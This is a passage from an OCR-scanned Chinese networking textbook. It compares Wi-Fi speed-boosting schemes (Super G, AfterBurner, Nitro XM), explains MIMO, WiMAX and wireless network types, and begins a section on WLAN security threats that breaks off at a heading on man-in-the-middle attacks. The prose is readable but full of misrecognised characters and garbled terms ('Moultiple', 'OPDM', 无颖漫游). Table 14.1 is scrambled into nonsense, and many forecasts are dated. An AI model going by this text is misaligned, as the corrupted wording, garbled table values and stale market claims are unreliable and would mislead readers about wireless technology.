道 11(2. 451 一 2. 473GHz) 是 互 不 重 登 的。 而 Super G 将 频道 锁定 在 Channel 6, 占 用 了 
2. 414 一 2.458GHz 的 44MHz 频谱 空间 ,也 就 是 侵入 到 频道 1 和 频道 11 中 。 倘 若 覆 盖 区 域 
内 有 应 用 这 两 个 频带 的 无 线 网 络 ,Super G 将 对 其 造成 干扰 , 反 过 来 自身 也 会 受到 干扰 。 即 
Super G 在 抗 干扰 方面 比 单传 输 频道 的 IEEE 802. 11g 要 差 。 不 过 这 一 缺陷 并 不 会 给 用 户 
带 来 很 大 难题 ,因为 在 家 庭 环境 和 小 型 企业 中 ,一 般 对 应 单一 标准 的 无 线 环境 ,干扰 问题 完 
全 不 存在 。 只 是 对 于 企业 级 无 限 环境 中 ,为 了 覆盖 较 大 的 区 域 往往 是 采用 多 个 无 线 接 入 点 ， 
为 了 让 客户 端 在 该 区 域内 能 够 做 到 无 颖 漫游 ,每 个 相 邻 接 入 点 的 覆盖 范围 都 必须 有 一 定 程 
度 的 重 倒 。 在 此 种 环境 下 ,如 果 无 线 信 号 的 频道 也 出 现 重 琶 ,冲突 和 信号 干扰 将 难以 避免 。 

(8) 类 似 技术 比较 

@ Broadcom AfterBurner 技术 : 相对 于 Super G,Broadcom 的 AfterBurner 技术 名 气 
要 小 得 多 ,尽管 它 能 够 达到 125Mb/s 的 理论 性 能 ,看 起 来 比 Super G 胜出 一 筹 , 但 该 项 技术 
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整整 比 Super G 的 出 台 时 间 晚 了 一 年 ,使 其 失去 了 抢占 市 场 时 机 ,AfterBurner 技术 只 是 被 
Linksys、Buffalo 和 ASUS 等 少数 无 线 设 备 商 所 采用 ,其 中 Linksys 将 该 技术 更 名 为 
SpeedBooster, 相 关 的 产品 在 2005 年 已 面市 。 

与 Super G 不 同 ,AfterBurner 技术 并 没有 采用 双 频 道 拥 绑 的 方式 ,仍然 是 依靠 单个 频 
道 传输 ,但 它 同样 通过 了 类 似 动态 包 突 发 和 快速 帧 的 技术 来 实现 性 能 的 提升 。 

尽管 IEEE 802. 11g 的 速率 从 IEEE 802. 11b 的 11Mb/s 提升 到 54Mb/s, 但 数据 发 送 
时 的 无 线 报头 仍然 需要 占用 同样 的 时 间 , 而 这 部 分 开销 并 不 涉及 真正 的 数据 包 发 送 。 在 
AfterBurner 技术 中 ,相同 目标 地 址 的 多 个 数据 包 被 结合 在 一 起 ,这 样 多 个 数据 包 可 以 被 连 
续 不 断 地 发 送 ,而 不 必 每 发 送 一 个 数据 包 都 要 进行 重复 的 寻 址 定位 操作 。 不 难看 出 ,这 项 技 
术 与 Super G 中 的 “快速 帧 ”概念 如 出 一 纤 。 另 外 ,AfterBurner 系统 还 拥有 一 项 新 的 帧 突 发 
技术 (frame burst) , 它 可 以 让 客户 端 连 续 不 停 地 发 送 多 个 数据 帧 ,以 保障 无 线 媒 体 流 的 传输 
能 够 正常 进行 一 一 这 项 技术 与 Super G 中 的 “动态 包 突 发 "基本 上 属于 相同 的 概念 。 

在 实际 的 产品 测试 中 Atheros Super G 设备 普遍 能 达到 35Mb/s 一 40Mbys 的 平均 速 
率 , 而 AfterBurner 产品 最 多 只 能 达到 34Mb/s, 实 际 性 能 略 落后 于 Super G。 

G@ Conexant 的 Nitro XM 技术 : 高 达 140Mbys 的 理论 速率 是 Conexant Nitro XM 技 
术 最 引 人 注 目的 地 方 ,但 Nitro XM 的 实际 表现 与 之 相差 甚 远 ,少数 采用 该 技术 的 产品 在 实 
测 中 只 能 达到 平均 22 一 30Mb/s。Nitro XM 通过 两 种 手段 来 提升 无 线 网 络 的 传输 速率 ; 其 
一 便 是 采用 数据 压缩 技术 。 在 数据 发 送 之 前 ,Nitro XM 设备 预先 通过 类 似 WinZip 的 压缩 
算法 将 数据 包 进 行 压缩 ,由 此 有 效 地 减少 了 数据 包 的 大 小 (但 对 已 经 压缩 过 的 数据 包 不 太 有 
效 )。 在 用 户 看 来 ,就 相当 于 网 络 的 吞吐 量 获得 了 明显 的 提升 。 尽 管 在 Super G 系统 中 也 可 
以 看 到 压缩 技术 ,但 Nitro XM 在 这 方面 应 该 更 好 一 些 ,至 少 从 140Mb/s 理论 速率 性 能 可 以 
看 出 这 一 点 。 也 因为 对 压缩 解压 技术 要 求 较 高 ,Nitro XM 对 应 的 无 线 设备 对 CPU 要 求 较 
高 一 一 无 线 客户 端 大 多 拥有 高 速 的 CPU, 可 以 借助 CPU 的 性 能 进行 压缩 或 解压 ,但 起 着 核 
心 作 用 的 无 线 AP 不 能 享受 这 种 待遇 ,集成 一 块 高 性 能 的 嵌入 式 处 理 器 芯片 是 必须 的 选择 ， 
而 这 不 可 避免 地 导致 了 成 本 的 上 涨 。 

采用 DirectLInk 的 直接 传输 模式 是 Nitro XM 技术 的 第 二 个 关键 点 。 在 IEEE 802. 11 
的 规范 定义 中 ,可 以 了 解 到 该 标准 族 的 无 线 网 络 可 支持 “基础 (Infrastructure)”“ 特 殊 (Ad 
hoc) ”两 种 传输 模式 。 在 基础 模式 下 ,任何 两 个 无 线 客户 端 进行 数据 交换 都 必须 经 由 AP 转 
接 , 相 当 于 多 了 一 个 中 介 传 输 的 步骤 ; 特殊 模式 也 被 称 为 点 对 点 模式 ,无 线 客户 端 可 以 在 
AP 的 监控 下 进行 数据 交换 ,在 理想 情况 下 ,特殊 模式 传输 数据 时 消耗 的 时 间 仅 相当 于 基础 
模式 的 一 半 , 而 Nitro X 的 DirectLInk 模式 便 以 IEEE 802. 11 定义 的 特殊 模式 为 基础 -一 
与 IEEE 802. 11 的 组 网 方式 有 所 不 同 的 是 ,Nitro XM 网 络 中 的 DirectLInk 客户 端 必须 同 
一 个 支持 Nitro XM 的 无 线 AP 相连 ,AP 本 身 并 不 参与 两 个 客户 端的 实际 数据 交换 ,但 它 
将 对 整个 传输 过 程 进行 监控 和 协调 ,以 保证 客户 端 间 的 传输 性 能 可 以 始终 保持 在 较 好 的 状 
态 下 。 

然而 ,点 对 点 DirectLInk 模式 也 限制 了 Nitro XM 技术 的 使 用 范围 一 一 为 实现 直接 通 
信 , 所 有 的 无 线 客户 端 都 必须 在 对 方 的 有 效 范 围 内 ,如 果 客 户 端 分 别 在 无 线 AP 的 两 个 方向 
并 且 距 离 较 远 ,那么 它们 将 无 法 形成 有 效 的 直接 通信 ,最 终 不 得 不 继续 依靠 无 线 AP 来 对 数 
据 进行 转 接 。 
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Nitro XM 技术 的 性 能 备 受 争议 ,Conexant 标 称 的 最 高 速度 达到 140Mb/s, 并 表明 在 测 
试 中 可 以 达到 70Mb/s, 但 同 Conexant 的 宣传 有 一 些 出 人 。 或 许 正 是 因为 该 技术 的 实现 代 
价 较 高 ,覆盖 范围 小 又 没有 什么 性 能 优势 ,没有 多 少 设备 厂商 愿意 接受 Nitro XM 技术 ,市 
面 上 几乎 见 不 到 相关 的 产品 ,所 以 该 技术 谈 不 上 什么 实际 影响 力 。 

(9) 总 结 

Super G 与 AfterBurner 技术 的 应 用 让 无 线 网 络 脱离 了 性 能 低下 的 传统 印象 。 但 即便 
是 最 优秀 的 Super G 技术 ,也 都 难以 在 实际 性 能 上 同 传统 的 100Mb/s 以 太 网 抗衡 ,无 线 网 
路 想 获 得 更 广泛 的 应 用 ,继续 提高 传输 性 能 和 覆盖 范围 是 唯一 的 途径 。 目 前 ,IEEE 正在 制 
定 的 下 一 代 无 线 网 络 的 标准 802. 11n 就 以 100Mbys 的 实际 传输 性 能 为 基本 目标 , 它 所 依赖 
的 便 是 现 已 进入 实用 化 的 MIMO(Moultiple Input Multipleoutput, 多 输入 多 输出 ) 技 术 。 


2. MIMO 技术 


(1) MIMO 技术 的 基本 原理 

MIMO 的 历史 可 追溯 到 1985 年 ,当时 美国 的 贝尔 实验 室 发 表 了 一 系列 关于 MIMO 技 
术 的 文章 ,详细 阐述 了 多 天 线 通信 系统 。MIMO 的 基本 结构 非常 简单 : 任何 一 个 无 线 通 信 
系统 ,只 要 发 射 端 与 接受 端 都 采用 多 个 天 线 或 者 矩阵 式 阵列 天 线 , 便 可 以 构成 一 套 无 线 
MIMO 系统 。 发 送 端 的 多 天 线 同 时 将 不 同 的 无 线 信号 输出 ,而 接收 端的 多 天 线 分 别 在 接收 
后 对 其 做 解码 合成 处 理 ,这 也 就 是 所 谓 的 “多 输入 ,多 输出 "的 概念 ,或 者 简洁 地 翻译 成 “多 进 
多 出 ”。 

在 MIMO 系统 中 ,每 个 天 线 对 应 一 组 独立 的 数据 传输 ,通过 不 同 的 编码 方式 将 它们 
严格 的 区 分 ,无 论 是 输入 还 是 输出 都 是 由 多 个 数据 链 路 同步 进行 ,将 数据 传输 性 能 提高 
数 倍 。 更 难能可贵 的 是 ,MIMO 的 并 行 传输 不 需要 占用 其 他 频谱 资源 ,在 实际 测试 中 ， 
MIMO 技术 的 频谱 资源 可 以 达到 20 一 40b/s/Hz,IEEE 802. 11 定义 一 个 频道 占用 22MHz 
频带 ,也 就 是 说 MIMO 的 最 高 速率 可 达到 400Mb/s 以 上 ,而 且 只 占用 一 个 传输 频道 。 常 规 
的 无 线 通信 技术 (移动 蜂窝 网 络 ,IEEE 802. 11a/b/g 网 络 ) 只 能 达到 1 一 5b/s/Hz 的 频谱 效 
率 , 即 便 在 点 对 点 的 固定 微波 系统 中 ,频谱 效率 也 不 过 只 有 10 一 12b/s/Hz。 由 于 缺乏 实质 
性 的 需求 ,MIMO 技术 并 没有 进入 实用 化 ,直到 IEEE 802. 11 无 线 局 域 网 开始 流行 之 后 , 业 
界 才 注意 到 MIMO 的 存在 价值 ,并 很 快 投入 到 相关 的 技术 研发 中 ,下 一 代 无 线 网 络 标准 
IEEE 802. 11n 也 将 该 技术 作为 基础 。 

从 本 质 上 看 ,MIMO 实际 上 是 为 系统 提供 “空间 复 用 增益 ”和 “空间 分 级 增益 ”, 这 两 项 
技术 分 别 用 于 提高 速率 和 对 信号 作 增 强 。 空 间 复 用 通过 在 接收 端 和 发 射 端 使 用 多 副 天 线 ， 
充分 利用 空间 传输 中 的 多 径 矢 量 ,在 同一 个 传输 频道 上 实现 多 个 数据 传输 通道 。 每 个 数据 
通道 也 被 称 为 MIMO 的 子 信道 ,对 应 一 个 发 射 /接收 天 线 。MIMO 系统 中 的 天 线 数量 越 多 ， 
网 络 的 传输 速率 就 越 高 ,两 者 是 线性 关系 。MIMO 通信 系统 的 工作 模式 如 图 14.7 所 示 。 

首先 , 待 传输 的 一 组 信号 流 经 过 * 串 /并 ”转换 ,为 多 组 并 行 的 子 信号 流 一 一 有 几 个 发 送 
天 线 就 对 应 几 组 字 信 号 流 , 这 项 转换 任务 由 发 送 端 的 “MIMO 信号 处 理 器 "完成 ; 然后 ,天 线 
将 各 自负 责 的 信号 流 同时 输出 ,由 于 采用 特殊 的 地 址 编码 机 制 ,每 一 个 发 射 天 线 都 会 对 接收 
端 产生 一 个 不 同 的 空间 信号 ,接收 方 根据 空间 信号 的 差异 来 区 分 数据 流 ,避免 发 生 数据 混乱 
的 情况 。 
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图 14.7 MIMO 系统 工作 模式 


与 空间 复 用 增益 不 同 ,空间 分 级 增益 技术 的 重点 在 于 提高 无 线 传 输 的 覆盖 范围 和 抗 干 
扰 性 。 无 线 网 络 的 使 用 者 一 定 会 发 现 设备 的 信号 覆盖 能 力 远 远 低 于 产品 标 称 的 范围 ,原因 
便 是 标 称 范 围 是 在 理想 的 无 屏蔽 .无 干扰 环境 下 得 到 的 。 而 在 实际 环境 中 ,总 是 存在 各 种 物 
体 ,无 线 电信 号 在 遇 到 这 些 物 体 时 会 发 生 反射 现象 。 反 射 信号 (包括 多 次 反射 的 信号 ) 从 多 
方向 、 多 途径 到 达 接 收 端 ,与 发 射 信号 在 相位 上 相关 ,会 对 接收 端 产生 干扰 ,造成 接收 信号 出 
现 失 真 ,如 波形 展 宽 、 波 形 重 倒 和 波形 畸变 等 。 多 径 干扰 现象 存在 于 所 有 的 无 线 通 信和 系统 
中 ,包括 卫星 通信 ,微波 通信 ,移动 通信 ,短波 通信 等 ,如 何 有 效 地 抑制 多 径 干 扰 成 为 所 有 无 
线 通信 技术 要 共同 面 对 的 问题 。 解 决 的 途径 有 两 个 : 第 一 ,设法 将 干扰 排除 ,即将 最 强 的 有 
用 信号 分 离 出 来 ,将 其 他 路 径 来 源 的 信号 剔除 ,让 接收 端 获得 一 个 纯净 的 信号 源 ,这 也 是 最 
直接 的 方案 ,但 这 种 方法 无 法 避免 无 线 传输 中 的 信道 衰减 现象 ,尤其 在 多 障碍 物 的 室内 环境 
中 衰减 现象 更 为 严重 。 第 二 ,设法 变 害 为 利 ,通过 算法 将 多 径 干 扰 转 变 为 有 用 的 信号 ,这 种 
机 制 不 仅 可 以 完全 消除 多 径 干扰 ,而 且 可 以 增强 信号 的 穿 透 力 ,从 而 提升 无 线 网 络 的 实际 覆 
盖 能 力 一 一 这 其 实 就 是 MIMO 系统 所 采用 的 “空间 分 集 技术 ”思想 。 

在 具体 实现 上 ,MIMO 的 分 级 技术 主要 以 OFDM 技术 相 结 合 的 形态 出 现 的 。OFDM 
是 一 项 高 效 的 多 载 技 术 (Orthogonal Frequency Division Multiplexing, 正 交 频 分 复 用 ), 它 
采用 一 种 不 连续 的 信号 调制 机 制 ,将 大 量 信号 成 单一 的 信号 。MIMO OFDM 无 线 通信 系统 
可 以 达到 两 种 效果 : 一 是 系统 具备 很 高 的 传输 速率 ,二 是 无 线 传输 达到 很 强 的 可 靠 性 。 正 在 
制定 的 802. 11n 标准 将 采用 MIMO OFDM 方案 ,其 最 高 传输 速率 也 将 突破 320Mb/s 的 水 平 ， 
平均 传输 速率 也 将 突破 108Mb/s, 在 性 能 上 完全 超越 100Mb/s 以 太 网 ,具有 极 高 的 可 用 性 。 

(2) MIMO 的 两 种 实现 方案 

MIMO 技术 领域 可 分 为 两 大 体系 ,其 一 是 Airgo 公司 提出 的 SDM (Spatial Division 
Mnultiplexing, 空 间 多 任务 传输 ) 与 MRC 技术 ,前 者 为 发 送 端 技 术 , 后 者 则 是 接收 端 技 
术 一 一 Airgo 将 这 套 方案 定名 为 True MIMO。SDM 是 指 在 单一 传输 频道 中 ,同时 传输 数 
个 各 自 独 立 的 数据 流 ,每 个 数据 流 经 由 一 个 天 线 发 射 和 接收 ,并 分 别 作 解 码 处 理 。 这 种 技术 
可 以 增加 传输 频道 中 的 数据 流 数量 ,从 而 达到 增加 网 络 流量 的 目的 。 目 前 Linksys 与 
Belikin( 贝 尔 金 ) 所 生产 的 支持 MIMO 技术 无 线 设备 便 采用 该 套 方案 。 第 二 种 是 Ruckus 
Wireless 和 Atheros 采用 的 “波束 成 形 技术 (Beamforming)”, 在 传输 前 将 一 个 数据 流 作 分 
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解 ,然后 利用 多 根 天 线 或 天 线 阵列 同时 传输 出 去 ,也 就 是 说 各 个 数据 流 在 逻辑 上 并 不 相互 独 
立 。Netgear( 网 件 ) 和 了 D-Link 推出 的 MIMO 无 线 设备 便 采用 了 “ 波 东 成形” 技术 ,其 中 
Netgear 采用 Ruckus Wireless 的 无 线 控制 芯片 ,但 将 其 重新 命名 为 Range Max, 对 应 的 产 
品 为 WPN824 无 线路 由 器 (七 根 内 置 天 线 ); 而 D-Link 则 采用 Atheros 公司 的 控制 芯片 ,内 
建 四 组 天 线 。 

无 论 是 空间 区 分 多 任务 方案 还 是 Beamforming 方案 ,都 可 以 让 MIMO 技术 的 卓越 性 能 
获得 充分 的 发 挥 。 不 过 目前 上 市 的 第 一 代 MIMO 产品 在 规格 上 仍 比较 保守 ,最 高 速率 指标 
大 多 停留 在 108Mb/s 左右 ,实际 速率 在 40Mb/s 左右 ,与 一 些 品质 优秀 的 Super G 产品 相 
当 。 但 在 信号 穿 透 能 力 方面 , MIMO 产品 普遍 优 于 Super G 产品 ,这 一 点 有 机 会 接触 到 
MIMO 的 用 户 应 该 有 所 体会 。 不 过 ,如 果 用 户 打算 构建 一 套 MIMO 网 络 系统 ,就 必须 将 已 
有 的 所 有 IEEE 802. 11b/g 设备 完全 丢弃 ,然后 全 面 更 新 为 MIMO 技术 的 网 络 产品 ,包括 无 
线路 由 器 .无线 AP 无线 PCI 网 卡 和 PCMIA 网 卡 。 由 于 当前 MIMO 的 硬件 成 本 高 昂 , 用 
户 将 需要 花费 高 昂 的 代价 才能 完成 整套 系统 的 升级 ,不 过 这 笔 投 资 可 以 让 用 户 的 无 线 网 络 
系统 发 生 质 的 提升 ,还 是 非常 划算 的 。 如 果 用 户 为 了 省 钱 打算 打算 继续 使 用 IEEE 802. 11g 
或 IEEE 802. 11b 标准 的 无 线 网 卡 ,MIMO 虽然 可 以 提供 对 这 两 项 规格 的 向 下 兼容 ,但 在 此 
种 情况 下 网 络 仍 将 运行 在 低速 的 IEEE 802. 11g/b 模 式 。 因 此 ,如 果 用 户 打算 升级 网 络 ,将 
设备 全 部 更 换 应 该 是 个 明智 的 做 法 ; 当然 ,这 样 做 是 否 合理 就 要 看 个 人 的 需求 。 还 有 一 个 
必须 提 到 的 是 MIMO 技术 目前 未 实现 标准 化 ,每 个 无 线 设 备 厂 商 的 技术 方案 可 能 都 不 相 
同 ,即便 基于 相同 的 技术 ,也 未 必 能 够 具有 理想 的 兼容 性 ,为 了 让 网 络 运行 在 最 佳 状态 下 ,用 
户 就 必须 购买 同一 个 品牌 的 MIMO 无 线 产 品 。 

(3) MIMO 领域 的 技术 发 展 

尽管 IEEE 802. 11n 标准 迟 迟 无 法 确立 ,MIMO 的 实用 化 程度 并 没有 受到 影响 。 在 该 
领域 ,Airgo Network 占据 一 定 的 优势 ,Airgo 测试 了 公司 的 第 三 代 True MIMO 芯片 ,达到 
了 240Mb/s 的 理论 速率 和 超过 120Mbys 的 实际 速率 。 传 输 速率 比 大 多 数 以 太 网 速率 还 要 
快 出 不 少 。Airgo 计划 在 2006 年 初 向 市 场 供应 这 种 第 三 代 True MIMO 无 线 控制 芯片 。 

Airgo 在 技术 和 产品 上 的 领先 优势 获得 终端 市 场 的 认可 ,嗅觉 敏锐 的 Gateway 已 经 重 
新 设计 该 公司 的 若干 笔记 本 计算 机 产品 ,以 容纳 Airgo MIMO 芯片 需要 的 多 条 天 线 ; 三 
星 公司 也 计划 以 Airgo 的 MIMO 无 线 芯 片 组 来 代 蔡 Intel 公司 的 Centrino 平台 芯片 ; 在 无 
线 设 备 商 方面 ,Airgo 获得 了 linksys、Belkin 和 Buffalo 的 强力 支持 。 很 明显 ,Airgo 通过 事 
实 标准 的 策略 来 抢 得 先 机 。Ruckus Wireless 公司 (该 公司 前 称 为 Video54) 也 在 2004 年 底 
开发 出 自己 的 BeamFlex MIMO 技术 方案 ,Netgear 公司 从 中 获得 授权 ,并 在 2005 年 一 季度 
将 RangeMax 系列 产品 投放 市 场 一 -由 于 当时 缺乏 与 之 竞争 的 产品 ,Netgear 获得 了 巨大 
的 成 功 ,RangeMax 系列 成 为 美国 零售 渠道 最 受 欢迎 的 无 线 产 品 ,在 国际 上 也 获得 热烈 的 追 
捧 。 不 过 相对 来 说 ,Ruckus Wireless 公司 实力 单薄 ,仍然 依靠 融资 运作 ,难以 在 802. 11n 标 
准 中 掌握 多 少 话语 权 。 

相 比 之 下 ,Atheros 在 MIMO 领域 进展 相对 落后 ,该 公司 依靠 Super G 技术 成 为 无 线 领 
域 的 领先 者 之 一 ,尽管 Atheros 目前 也 在 开发 名 为 Vlocity 的 MIMO 技术 ,该 公司 原 计 划 在 
2005 年 三 季度 推出 符合 IEEE 802. 11n 草案 标准 的 无 线 控制 芯片 ,但 由 于 802. 11n 草案 并 
未 按时 推出 ,Atheros 的 产品 计划 也 就 成 为 问题 。Broadcom 也 有 相同 的 计划 , 它 在 产品 进 
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度 上 同样 大 幅度 落后 于 Airgo 公司 。 第 三 代 True MIMO 芯片 即将 面试 的 时 候 ,Airgo 又 开 
始 同 Cisco 的 Linksys 子 公司 一 起 合作 ,进行 第 四 代 True MIMO 无 线 芯 片 的 开发 ,以 期 在 
产品 上 与 对 手 拉 开 差距 。 

尽管 MIMO 尚未 获得 标准 化 ,先期 上 市 的 产品 很 难 与 未 来 的 IEEE 802. 11n 正式 规范 
兼容 ,但 许多 企业 用 户 和 个 人 用 户 还 是 对 MIMO 产品 充满 期 待 ,预算 充裕 的 用 户 已 经 开始 
打算 将 已 有 的 无 线 网 络 系统 更 换 为 性 能 卓越 的 MIMO 网 络 一 一 这 并 不 是 说 用 户 不 介意 产 
品 的 兼容 性 ,而 是 迫 于 对 工作 效率 的 现实 需求 。 从 目前 的 情况 来 看 ,Airgo 成 为 大 赢家 没有 
什么 悬念 ,产品 上 的 优势 让 它 可 以 迅速 积累 起 牢固 的 用 户 基础 ,增强 在 802. 11n 标准 制定 中 
的 话语 权 。 

从 最 初 的 IEEE 802. 11b 到 现在 流行 的 Super G、MIMO, 以 及 即将 出 现 的 IEEE 802. 11n 
标准 ,无 线 网 络 技 术 在 应 用 中 获得 不 断 的 发 展 。 当 无 线 局 域 网 的 平均 速度 超越 100Mbys 的 
时 候 , 无 线 技术 取代 以 太 网 将 被 真正 提 上 日 程 。 除 了 笔记 本 之 外 ,台式 机 也 将 有 望 将 无 线 网 
卡 作为 标准 配置 ,无 线 网 络 产 业 也 将 因此 蓬 擂 发 展 。 作 为 最 关键 的 一 环 ,IEEE 802. 1ln 标 
准 的 进度 的 确 令 人 担忧 ,复杂 的 斗争 将 这 项 原本 可 马上 投入 使 用 的 标准 拖 后 了 数 年 ,尽管 如 
此 ,我 们 对 其 前 景 仍 表示 乐观 。 


3. 未 来 无 线 技术 的 发 展 


未 来 的 无 线 传输 速率 还 会 比 Super G 技术 高 很 多 ,这 就 是 WiMAX 技术 。WiMAX 的 
无 线 接 人 范围 从 几 千 米 到 几 十 千 米 , 基 本 上 是 城 域 的 范围 ,数据 传输 速率 最 高 可 达 20 一 
80Mb/s 甚至 100Mb/s, 是 3G 的 几 十 倍 ; 而 且 基 站 部 署 的 成 本 比 3G 低 。 从 无 线 连 接 范 围 
介 于 3G 和 Wi-Fi 之 间 来 看 ,用 “大 Wi-Fi” 来 形容 WiMAX 还 是 很 贴切 的 。 

韩国 电信 公司 已 经 规划 出 了 未 来 的 无 线 网 络 组 成 的 样子 : 用 3G、WiMAX( 热 区 ) 和 
Wi-Fi( 热 点 ) 将 全 国 范 围 的 城市 和 数据 传输 业务 量 大 的 咖啡 馆 、 图 书馆 等 小 区 域 结合 起 来 ， 
实现 无 颖 的 无 线 漫游 。 

另外 ,IEEE 802. 16e(IEEE 802. 16b/ IEEE 802. 16a 的 移动 增补 方案 ) 的 标准 化 工作 已 
在 2005 年 完成 ,芯片 实体 会 在 2006 年 推出 ,相应 的 WiMAX 产品 与 标准 讨论 可 谓 是 相互 影 
响 着 前 进 。 将 来 WiMAX(OPDM 技术 ) 可 能 演进 为 4G 的 概念 。 

目前 市 场 上 销售 的 大 部 分 笔记 本 计算 机 都 内 置 了 无 线 网 卡 ,其 中 大 部 分 是 基于 Intel 公 
司 的 迅驰 (Centrion) 平 台 。 采 用 迅驰 技术 的 笔记 本 计算 机 可 以 100% 与 IEEE 802. 11 无 线 
网 络 兼容 。 基 于 迅驰 平台 的 笔记 本 计算 机 通常 可 以 看 到 一 个 粉红 和 蓝 色 的 Centrion Logo 
商标 。 实 际 上 迅驰 平台 不 仅 指 无 线 网 卡 , 它 是 Pentium M 处 理 器 、Intel855 芯片 组 和 Intel 
ProBG 无 线 网 卡 的 组 合 。 迅 驰 平台 的 推出 对 无 线 网 络 的 普及 功 不 可 没 , 随 之 而 来 的 是 其 他 
各 种 设备 也 开始 提供 Wi-Fi 网 络 支持 ,目前 在 台式 机 、PDA ,移动 电话 中 都 可 以 看 到 集成 的 
无 线 网 卡 。 


14.2 无 线 网 络 的 分 类 


无 线 网 络 的 类 型 根据 使 用 设备 的 不 同 ,也 可 以 进行 不 同 的 分 类 ,下 面 根据 网 络 的 解决 方 
案 和 连接 方式 进行 系统 的 分 类 。 
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1421 根据 网 络 解决 方案 分 类 


无 线 数据 网 络 解决 方案 包括 : 无 线 个 人 网 (WPAN) ,无 线 局 域 网 (WLAN) ,无线 LAN- 
to-LAN 网 桥 、 无 线 城 域 网 (WMAN) .无线 广域网 WWAN)。 

无 线 个 人 网 主要 用 于 个 人 用 户 工 作 空间 ,典型 覆盖 半径 为 数 米 。 可 以 同步 计算 机 ,传输 
文件 .访问 本 地 外 围 设备 如 打印 机 等 。 主 要 技术 包括 蓝牙 技术 和 红外 技术 (IrDA) 。 无 线 局 
域 网 主要 用 于 宽带 家 庭 、 大 楼 内 部 以 及 园区 内 部 ,典型 覆盖 半径 为 10 一 100m。 目 前 主要 技 
术 为 IEEE 802. 11 系列 。 

无 线 LAN-to-LAN 网 桥 主要 用 于 楼 宇 之 间 的 网 络 通信 ,典型 覆盖 半径 为 数 公里 。 许 多 
无 线 网 桥 采 用 了 IEEE 802. 11b 技术 。 

无 线 城 域 网 和 广域网 覆盖 城 域 和 广 域 环境 ,主要 用 于 Internet/E-mail 访问 ,但 提供 的 
带宽 比 无 线 局 域 网 技术 要 低 很 多 。 各 种 无 线 数据 网 络 解决 方案 的 比较 如 表 14. 1 所 示 。 


表 14.1 根据 解决 方案 的 无 线 网 络 分 类 


分 类 覆盖 区 域 应 用 用 户 使 用 费 典型 带宽 
替代 点 到 点 1~4Mb/s(IrDa) 
WE 来 加 bm 连 线 于 720kb/s( 蓝 牙 ) 
2~3Mb/s(802. 11) 
有 线 LAN 的 延 10Mb/s(802. 11b) 
WA 大 类 由 机 / 国 攻 伸 或 蔡 代 有 22Mb/s(802. 11g) 
54Mb/s(802. 11a) 
无 线 网 桥 大 楼 之 间 替代 有 线 连接 无 (大 多 数 情况 下 ) 2~10Mb/s 
WMAN 城 域 Internet/E-mail | 有 10~100kb/s 
WWAN 广 域 Internet/E-mail 有 9.6~14.4kb/s 


1422 根据 连接 方式 分 类 


无 论 无 线 网 络 采用 何 种 连接 方式 ,都 可 以 分 为 两 大 类 : 点 对 点 模式 和 Infrastructure 模 
式 。 下 面 对 这 两 种 组 网 模式 进行 对 比 介绍 。 

点 对 点 模式 (AD-hoc 或 Peer-to-Peer) 是 最 简单 的 无 线 网 络 连 接 方式 ,这 种 模式 允许 两 
台 或 多 台 计 算 机 不 依赖 于 任何 控制 中 心 就 能 够 相互 通信 。 搭 建 一 个 AD-hoc 模式 的 无 线 网 
络 非常 简单 ,硬件 的 需求 最 少 , 只 需 每 台 计 算 机 都 具有 支持 同一 种 协议 (如 IEEE 802. 11) 的 
无 线 网 卡 即 可 。 

点 对 点 模式 适合 刚刚 接触 Wi-Fi 的 入 门 用 户 。 但 如 果 需 要 互联 的 计算 机 很 多 ,使 用 
AD-hoc 就 很 难 管理 了 ,一 旦 AD-hoc 网 络 中 的 一 台 计 算 机 关机 ,整个 网 络 就 不 存在 了 。 
还 需要 注意 的 一 点 是 : 大 多 数 AD-hoc 网 络 的 传输 速率 都 只 有 11Mb/s, 即 使 使 用 IEEE 
802. 11g 技术 也 是 如 此 。 

在 Infrastructure 模式 下 ,除了 需要 连 和 人 网 络 的 每 台 计 算 机 都 带 有 兼容 的 IEEE 802. 11byg 
无 线 网 卡 外 ,还 需要 一 个 无 线 接 人 点 (Access Point) 来 进行 中 转 。 无 线 接 入 点 通常 支持 动 
态 的 主机 配置 协议 (DHCP,Dynamic Host Configuration Protocol) , 它 会 给 每 个 接 入 网 络 的 
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设备 分 配 一 个 唯一 的 卫 地 址 ,而 无 论 哪个 计算 机 关闭 ,都 不 影响 网 络 中 的 其 他 计算 机 的 
使 用 。 

构建 一 个 无 线 热点 最 好 采用 Infrastructure 方式 , 它 不 需要 让 某 一 台 计 算 机 一 直 开 着 ， 
同时 也 提供 了 一 定 的 安全 机 制 。Infrastructure 方式 的 另 一 个 优势 在 于 : 无 线 接 人 点 在 该 
模式 下 可 以 作为 无 线 网 络 桥接 器 来 扩展 当前 的 无 线 网 络 , 产 生 一 个 覆盖 范围 更 广 的 无 线 

当 使 用 Infrastructure 模式 组 网 时 ,应 当 考 虑 使 用 某 种 网 络 安全 机 制 ,比如 WEP 
(Wireless Equivalency Protocol) 或 者 更 严格 的 WPA(WiFi Protected Access) 机 制 ,让 每 个 
想 要 加 入 无 线 网 络 的 用 户 都 需要 使 用 口令 才能 进行 连接 。 


14.3 无 线 网 络 的 安全 


无 线 局 域 网 (WLAN) 具 有 安装 便捷 、 使 用 灵活 、 经 济 节约 .易于 扩展 等 有 线 网 络 无 法 比 
拟 的 优点 ,因此 无 线 局 域 网 得 到 越 来 越 广泛 的 使 用 。 但 是 由 于 无 线 局 域 网 信道 开放 的 特点 ， 
使 得 攻击 者 能 够 很 容易 的 进行 窃听 ,恶意 修改 并 转发 。 安 全 性 成 为 阻碍 无 线 局 域 网 发 展 的 
最 重要 因素 。 虽 然 无 线 局 域 网 需求 不 断 增长 ,但 安全 问题 也 让 许多 潜在 的 用 户 对 是 否 采用 
无 线 局 域 网 系统 犹 殉 不 决 。 


1431 无 线 局 域 网 的 安全 威胁 


利用 WLAN 进行 通信 必须 具有 和 较 高 的 通信 保密 能 力 。 对 于 现 有 的 WLAN 产品 , 它 的 
安全 隐患 主要 有 以 下 几 点 。 


1. 未 经 授权 使 用 网 络 服务 


由 于 无 线 局 域 网 的 开放 式 访问 方式 ,非法 用 户 可 以 未 经 授权 而 擅自 使 用 网 络 资源 ,不 仅 
会 占用 宝贵 的 无 线 信道 资源 ,增加 带宽 费用 ,降低 合法 用 户 的 服务 质量 ,而 且 未 经 授权 的 用 
户 没有 遵守 运营 商 提出 的 服务 条 款 , 甚 至 可 能 导致 法 律 纠纷 。 


2. 地 址 欺骗 和 会 话 拦截 (中 间 人 攻击 ) 


